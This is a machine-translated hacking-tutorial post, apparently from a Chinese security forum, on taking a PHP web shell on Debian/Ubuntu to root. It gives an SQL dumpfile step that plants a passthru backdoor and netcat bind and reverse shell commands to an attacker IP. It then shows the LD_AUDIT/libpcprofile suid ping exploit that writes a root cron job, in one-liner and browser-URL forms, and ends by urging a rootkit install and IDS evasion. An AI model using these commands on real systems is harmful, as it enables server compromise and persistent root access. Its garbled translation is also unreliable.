Hacking Book | Free Online Hacking Learning


[contribution] webshell remote rights

Posted by verstraete at 2020-02-27

Although Ubuntu has been released to 14.04 LTS, the attack ideas of foreign countries have always been 2 or 3 years ahead of that of China. The vulnerability demonstrated in this article is still of reference significance.

Ubuntu is based on Debian GNU / Linux, so shit Cough and cough. There are more or less the following vulnerabilities in Debian Linux distributions, so the attack ideas are applicable to most distributions. If you don't say much, let's enter the intense and exciting attack and defense practice!


|About loopholes|


Debian / Ubuntu remote privilege offering vulnerability, based on GNU dynamic linker DSO vulnerability (that is, the GNU C dynamic link library LD audit arbitrary DSO loading vulnerability, see http://www.exploit-db.com/exploits/15304/) for detailed vulnerability information. This problem should occur in other Linux releases of the same period (Note: release date = 2011)




The attack idea of this paper is not to modify / etc / passwd directly through the webshell with user / nobody permission or to use suisshell to raise rights. But through DSO vulnerability, we can directly use root account to execute commands, and then use root identity to establish socket to make a bind shell back door


|Start of text|


You get a PHP Web shell through SQL injection or upload vulnerability. One of the most classic ways to get a web shell is through the database outfile. The backdoor that can be used is <? Passthru ($_get ['c ');? >. (Wow, that's what foreigners say! Passthru function is similar to exec() used to execute command instruction)

The SQL statements that can be used are as follows (despise, it's easy for him to say, outfile requires at least three conditions: first, the directory can be written and executed; second, the database user has high authority; third, find the absolute path of the website. The second one is hard injury




`fm` longblob


insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);

select fm from fm into dumpfile '/opt/lampp/htdocs/xampp_backup.php';

drop table fm;

Flush logs;


In a word, after connecting, now you want to use Telnet, NC to connect and write binary code

perl -e ' print "\x41\x42\x43\x44"'


echo -en '\x41\x42\x43\x44'

To get a shell

(a few days ago, I read that wooyun sent a similar article yesterday, http://drops.wooyun.org/tips/1376, and he also drew lessons from foreign articles. It's frightening that domestic security is several years behind that of foreign countries.)

If it is not successful to write the shell directly, we will use PHP code to implement it (high energy ahead , write the following code to xampp_backup.php:


&lt;?php $File = "/tmp/nc";

$Handle = fopen($File, 'w');

$Data = "\x41\x42\x43\x44";

fwrite($Handle, $Data);

fclose($Handle); ?&gt;


Now you can use:


http://www.91ri.org/ xampp_backup.php?c=nc -l -p 9999 -e /bin/bash


http://www.91ri.org/ xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash

Write to your browser to create a shell:

Then connect locally with netcat:


uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)


Now we need to use DSO vulnerability to remotely claim rights. The detailed steps are as follows:

1. Set the permission mask to zero first to ensure that the correct RW RW RW / etc / cron. D / vulnerability is created:

2. Use the shell script to open the cron. D entry


$ echo -e '/bin/nc -l -p 79 -e /bin/bash' &gt; /tmp/exploit.sh


$ echo -e '/bin/nc localhost 8888 | /bin/bash' &gt; /tmp/exploit.sh

3. Set RW RW RW bit to / etc / cron. D /

$ chmod u+x /tmp/exploit.sh

4. Use the ping program with the suid bit to create the RW RW RW file in the cron Directory:

$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping

5. Set to create root shell every minute (similar to heartbeat message every minute)

$ echo -e '*/1 * * * * root /tmp/exploit.sh' &gt; /etc/cron.d/exploit

Now you have a root shell every minute, and then connect in the local NC:


uid=0(root) gid=0(root) groups=0(root)


|Express Lite|


Write directly in the interactive shell:

echo -e '/bin/nc -l -p 79 -e /bin/bash' &gt; /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' &gt; /etc/cron.d/exploit

Then local NC connection:


uid=0(root) gid=0(root) groups=0(root)


| webshell EXPLOIT  |


Use the xampp_backup.php file you have written before to write directly in the browser:

http:// www.91ri.org /xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' &gt; /tmp/exploit.sh

http:// www.91ri.org /xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh

http:// www.91ri.org /xampp_backup.php?c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping

http:// www.91ri.org /xampp_backup.php?c=echo -e '*/1 * * * * root /tmp/exploit.sh' &gt; /etc/cron.d/exploit

Then local NC connection:


uid=0(root) gid=0(root) groups=0(root)


|Simple webshell|


Write directly in browser:

http://www.91ri.org/ xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' &gt; /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' &gt; /etc/cron.d/exploit

Then local NC connection:


uid=0(root) gid=0(root) groups=0(root)




IDS / IPS will monitor your malicious traffic, so install rootkit BOT and leave

Payment of Bounty: the bounty is 150RMB, which has been distributed to the author's account on April 5.

Solicitation notice: 91ri has always believed that "you don't share with others, who shares with you". Sharing is indeed a very meaningful thing. In order to let the excellent students have a place to share their original opinions, and also to let more students benefit from sharing, we also hope to give a little heartfelt thanks to those who are willing to share, so we solemnly launched the "prize essay collection" activity! The details of this activity can be seen in the notice for soliciting manuscripts